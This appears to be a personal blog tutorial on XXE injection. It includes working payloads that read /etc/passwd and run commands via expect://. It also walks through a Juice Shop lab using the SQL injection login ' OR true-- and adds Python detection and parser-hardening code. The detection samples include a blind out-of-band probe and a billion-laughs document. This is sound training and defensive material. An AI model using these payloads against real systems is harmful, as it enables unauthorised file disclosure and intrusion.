Srivathsa Dhanvantri

XXE Attack! Learn how it works.

XML eXternal Entity injection (XXE), now listed in the OWASP Top 10 as item A4, is a type of attack against an application that parses XML input. It was a new addition to the OWASP Top Ten list in 2017.


This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser.




To understand XXE, it is a prerequisite to know the basics of markup languages and XML.



Markup Language

  • A system for annotating a document in a way that is distinguishable from the text.

  • Interpreted by browsers.

  • HTML, XHTML and XML are a few examples.

  • Used to present information.

XML


  • eXtensible Markup Language (XML) is a markup language.

  • It defines a set of rules for encoding documents in a format that is both human-readable and machine-readable.

  • XML was designed to store and transport data.

 

Example of XML Code


 <?xml version="1.0" encoding="UTF-8"?>
 <note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
 </note>


What does the code mean?


Note
To: Tove
From: Jani
Heading: Reminder
Body: Don't forget me this weekend!

 

Why Study XML?

  • XML plays an important role in many different IT systems.

  • XML is often used for distributing data over the Internet.

  • It is important (for all types of software developers!) to have a good understanding of XML.

How Can XML be Used?

  • XML is used in many aspects of web development.

  • XML is often used to separate data from presentation.

XML Separates Data from Presentation

  • XML does not carry any information about how to be displayed.

  • The same XML data can be used in many different presentation scenarios. Because of this, with XML, there is a full separation between data and presentation.

What are XML entities?


XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities &lt; and &gt; represent the characters < and >. These are meta-characters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

 

What is XXE Attack?


An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.


Impact of XXE Attacks

  • Disclosure of confidential data.

  • Denial of Service.

  • Server Side Request Forgery.

  • Port scanning from the perspective of the machine where the parser is located, and other system impacts.

XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.


XML DTD


  • DTD stands for Document Type Definition.

  • The purpose of a DTD is to define the structure and the legal elements and attributes of an XML document.


Note.dtd:

 <!DOCTYPE note
 [
   <!ELEMENT note (to,from,heading,body)>
   <!ELEMENT to      (#PCDATA)>
   <!ELEMENT from    (#PCDATA)>
   <!ELEMENT heading (#PCDATA)>
   <!ELEMENT body    (#PCDATA)>
 ]>

The DTD above is interpreted like this:


!DOCTYPE note - Defines that the root element of the document is note

!ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"

!ELEMENT to - Defines the to element to be of type "#PCDATA"

!ELEMENT from - Defines the from element to be of type "#PCDATA"

!ELEMENT heading - Defines the heading element to be of type "#PCDATA"

!ELEMENT body - Defines the body element to be of type "#PCDATA"

The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:


<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>

The URL can use the file:// protocol, and so external entities can be loaded from a file on the server. For example:


<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>

XML external entities provide the primary means by which XML external entity attacks arise.


Illustration of how the attack works


This image from portswigger.net helps us understand the attack process. I couldn't find a better picture than this on the internet to explain XXE. From the picture we can see that the attacker sends a custom XML document and exfiltrates the /etc/passwd file. The sensitive data is exposed through XXE here.


Types of XXE Attacks


  • Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.

  • Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.

  • Exploiting blind XXE to exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.

  • Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

Example 1: Accessing a local resource that may not return


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM  "file:///dev/random" >]>
<foo>&xxe;</foo>

Example 2: Remote Code Execution


If fortune is on our side, and the PHP “expect” module is loaded, we can get RCE.


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
  <user>`&xxe;`</user>
  <pass>`mypass`</pass>
</creds>

Example 3: Disclosing /etc/passwd or other targeted files


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

 

Let's get some hands-on experience, shall we?


Disclaimer: The demo is for awareness and learning purposes only. I would not be responsible if you indulge in any illegal hacking activities.


I will be using OWASP Juice-Shop installed on an Ubuntu VirtualBox VM to demonstrate a simple XXE attack.


OWASP Juice-Shop:


OWASP Juice-Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications!


Note: OWASP Juice-Shop can also run in a Docker container, but a few vulnerabilities such as XXE cannot be exploited when it runs in Docker. So we need to install Juice-Shop directly on our machine.


How to install OWASP Juice-Shop on Ubuntu?


  • Install node.js (sudo apt install node.js)

  • Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository)

  • Go into the cloned folder with cd juice-shop

  • Install npm (sudo apt install npm)

  • Run npm install (only has to be done before first start or when you change the source code)

  • Run npm start

  • Browse to http://localhost:3000

We can see that the juice-shop has successfully started. Let's access it using a browser.




We would be solving the XXE Data Access challenge.

To exploit XXE, we need to log in to an account in order to access the complaint section.


Here is the trick to login!

  • You will have to use SQL injection to login.

  • Click on Account and then click on login.

  • In the username field type ' OR true--

  • In the password field type anything and click on login.

  • You are now logged in as admin!

To exploit the XXE vulnerability in OWASP Juice-Shop we will be uploading an XML file in the complaint section.



Click on Complaint, a form will appear.


We would be uploading a custom XML file XXE.xml


XXE.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<trades>
    <metadata>
        <name>Apple Juice</name>
        <trader>
            <foo>&xxe;</foo>
            <name>B. Kimminich</name>
        </trader>
        <units>1500</units>
        <price>106</price>
        <name>Lemon Juice</name>
        <trader>
            <name>B. Kimminich</name>
        </trader>
        <units>4500</units>
        <price>195</price>
    </metadata>
</trades>


Click on submit and observe the response from the browser's developer tools.




Here we can see that, along with the error message, the contents of the /etc/passwd file are also displayed.

Also, we will get a notification that the challenge is solved.




 

How to find and test for XXE vulnerabilities?


Manually testing for XXE vulnerabilities generally involves:


  • Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.

  • Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.

  • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.
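The constructs listed above (file-based entities, URL-based entities, blind/out-of-band probes and XInclude) are also what a defender wants to recognise in uploaded XML before it ever reaches the parser. The following Python classifier is an added example for this post, not code from the original article or from Juice Shop: it scans a raw request body with regular expressions and reports which XXE-related constructs are present. The sample documents and the hostnames in them (internal.example, collaborator.example) are constructed for the example.

```python
import re
from typing import List
from urllib.parse import urlsplit

# Deliberately loose patterns over the raw bytes: firing on a DOCTYPE that
# sits inside a comment is an acceptable false positive for a pre-parser
# check, whereas missing one would not be.
QUOTED = rb'"[^"]*"|\'[^\']*\''
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_DECL_RE = re.compile(
    rb"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>%]+)\s+"
    rb"(?:(?P<kind>SYSTEM|PUBLIC)\s+(?P<lits>(?:" + QUOTED + rb")(?:\s+(?:" + QUOTED + rb"))?)"
    rb"|(?P<value>" + QUOTED + rb"))",
    re.IGNORECASE,
)
XINCLUDE_RE = re.compile(rb"<xi:include\b|http://www\.w3\.org/2001/XInclude", re.IGNORECASE)
ENTITY_REF_RE = re.compile(rb"&[^\s;&]+;")


def classify_xml_payload(body: bytes) -> List[str]:
    """Return a sorted list of findings for one XML request body.

    external-entity:<scheme>  an external entity declaration (file, http, expect, ...)
    parameter-entity          a '%' entity, typical of blind / out-of-band XXE
    entity-expansion          an internal entity that references other entities
                              repeatedly (the 'billion laughs' denial of service)
    xinclude                  XInclude markup, a DTD-less way to pull in files
    dtd-present               any DOCTYPE at all; most upload endpoints never need one
    """
    findings = set()
    if DOCTYPE_RE.search(body):
        findings.add("dtd-present")
    for m in ENTITY_DECL_RE.finditer(body):
        if m.group("param"):
            findings.add("parameter-entity")
        if m.group("kind"):
            # For PUBLIC there are two literals; the system identifier is the last one.
            literals = re.findall(QUOTED, m.group("lits"))
            sysid = literals[-1][1:-1].decode("latin-1")
            scheme = urlsplit(sysid).scheme.lower() or "file"  # bare paths are files
            findings.add(f"external-entity:{scheme}")
        elif len(ENTITY_REF_RE.findall(m.group("value"))) >= 3:
            findings.add("entity-expansion")
    if XINCLUDE_RE.search(body):
        findings.add("xinclude")
    return sorted(findings)


# Constructed sample bodies; the first two mirror the benign documents in the post.
SAMPLES = {
    "benign": b"<note><to>Tove</to><from>Jani</from></note>",
    "dtd-only": b"<!DOCTYPE note [<!ELEMENT note (to)><!ELEMENT to (#PCDATA)>]><note><to>Tove</to></note>",
    "file-read": b'<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>',
    "expect": b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id" >]><creds><user>&xxe;</user></creds>',
    "ssrf": b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal.example/status" >]><foo>&xxe;</foo>',
    "blind-probe": b'<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://collaborator.example/probe"> %ext;]><foo/>',
    "xinclude": b'<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="/etc/hostname"/></foo>',
    "billion-laughs": b"""<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;">
]><lolz>&lol2;</lolz>""",
}


def scan_samples() -> dict:
    """Classify every constructed sample and return {name: findings}."""
    return {name: classify_xml_payload(body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name:15s} {', '.join(findings) or '(clean)'}")
```

A check like this belongs in front of the parser, not instead of parser hardening: it is cheap to run in a WAF rule or an upload handler and gives you a log signal ("dtd-present" on an endpoint that only ever expects plain complaint data), but the real fix remains disabling external entities and XInclude in the parser itself.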



How to prevent XXE vulnerabilities?


Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.


Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.
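To show concretely what "a weakly configured parser" versus "external entity resolution disabled" means, here is an added Python example (not code from the original post or from Juice Shop). It uses the standard library's expat-based SAX reader, whose external-general-entities feature is exactly the switch described above, and runs the same document shape as the XXE.xml payload from the Juice Shop walkthrough against a throwaway secret file created in a temporary directory instead of /etc/passwd. The constructed file content, the temporary path and the helper names (parse_xml, contains_dtd, build_payload, demo) are all assumptions of this example.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data the parser reports, the way an
    application would when it reads field values out of the document."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_xml(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse with the stdlib SAX (expat) reader and return all text content.

    resolve_external_entities=True reproduces the weakly configured parser
    the post describes; False is the hardened setting (and the stdlib
    default since Python 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.text)


def contains_dtd(xml_bytes: bytes) -> bool:
    """Cheap pre-check: a complaint upload has no business carrying a DOCTYPE
    or entity declaration, so reject the document before it reaches the parser."""
    return re.search(rb"<!(DOCTYPE|ENTITY)\b", xml_bytes, re.IGNORECASE) is not None


def build_payload(path: str) -> bytes:
    """Constructed document with the same shape as the post's XXE.xml,
    but pointing the entity at `path` instead of /etc/passwd."""
    return (
        b'<?xml version="1.0" encoding="UTF-8"?>\n'
        b"<!DOCTYPE foo [<!ELEMENT foo ANY >\n"
        b'  <!ENTITY xxe SYSTEM "file://' + path.encode() + b'" >]>\n'
        b"<trades><metadata><name>Apple Juice</name>"
        b"<trader><foo>&xxe;</foo><name>B. Kimminich</name></trader>"
        b"</metadata></trades>"
    )


def demo() -> dict:
    """Run the weak and the hardened configuration against a throwaway
    secret file and return what each one handed back to the application."""
    secret = "root:x:0:0:root:/root:/bin/bash\n"  # constructed stand-in for /etc/passwd
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as f:
            f.write(secret)
        payload = build_payload(secret_path)
        return {
            "has_dtd": contains_dtd(payload),
            "weak": parse_xml(payload, resolve_external_entities=True),
            "hardened": parse_xml(payload, resolve_external_entities=False),
            "secret": secret,
        }


if __name__ == "__main__":
    r = demo()
    print("DTD present in upload:      ", r["has_dtd"])
    print("weak parser leaked secret:  ", r["secret"] in r["weak"])
    print("hardened parser leaked it:  ", r["secret"] in r["hardened"])
```

With the feature enabled the entity reference is replaced by the file's contents and the application sees them as ordinary text (which is what Juice Shop echoed back inside its error message); with it disabled the reference expands to nothing and the rest of the document is still processed normally, so turning the feature off costs a well-behaved client nothing. Other libraries expose the same switch under different names (for example libxml2's NOENT/DTDLOAD options or the Java DocumentBuilderFactory features); consult the OWASP cheat sheet for the one you use.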


For more details on prevention techniques for each of the languages that parse XML, please refer to the OWASP Cheat Sheet on XXE prevention.

 

Additional Resources to explore XXE further:


 

Thank you for reading my blog. This is my first blog and I've made an attempt to write on the XXE attack. I hope it was informative for you. Please do leave feedback.


1 Comment


fedoros
Apr 21, 2021

Great article on XXE attack. Very technical yet simple to follow. Many thanks!
